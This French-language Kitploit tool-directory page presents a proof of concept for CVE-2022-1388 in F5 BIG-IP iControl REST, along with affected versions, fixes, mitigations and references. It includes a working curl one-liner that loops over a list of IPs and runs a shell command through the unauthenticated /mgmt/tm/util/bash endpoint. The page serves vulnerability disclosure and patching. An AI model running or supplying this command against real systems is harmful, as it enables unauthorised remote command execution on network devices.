Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-1388 — BIG-IP iControl REST vulnerability CVE-2022-1388 PoC | Kitploit
Outils/GitHubGitHub/shamo0/cve-2022-1388
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubshamo0/cve-2022-1388

CVE-2022-1388

BIG-IP iControl REST vulnerability CVE-2022-1388 PoC

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Vulnérabilité BIG-IP iControl REST CVE-2022-1388 PoC

f5logo

Cette vulnérabilité peut permettre à un attaquant non authentifié ayant un accès réseau au système BIG-IP via le port de gestion et/ou les adresses IP self d'exécuter des commandes système arbitraires, de créer ou supprimer des fichiers, ou de désactiver des services.

PoC

Vous pouvez utiliser la commande curl suivante pour vérifier la vulnérabilité F5 Big-IP ou utiliser le script Python fourni.

root@kitploit:~
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done

Versions vulnérables (Big-IP)

BrancheVersions vulnérablesCorrectifs introduits
11.x11.6.1-11.6.5Aucun correctif
12.x12.1.0-12.1.6Aucun correctif
13.x13.1.0-13.1.413.1.5
14.x14.1.0-14.1.414.1.4.6
15.x15.1.0-15.1.515.1.5.1
16.x16.1.0-16.1.216.1.2.2
17.xAucune17.0.0

Atténuation

  • Mettez à jour vers la version corrigée dans la colonne ```Correctifs introduits```. (Méthode préférée)
  • Bloquez l'accès iControl REST via l'adresse IP self
  • Bloquez l'accès iControl REST via l'interface de gestion
  • Modifiez la configuration httpd de BIG-IP

Pour plus d'informations sur l'atténuation, consultez les références.

Références

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://github.com/ZephrFish/F5-CVE-2022-1388-Exploit
Télécharger l’outil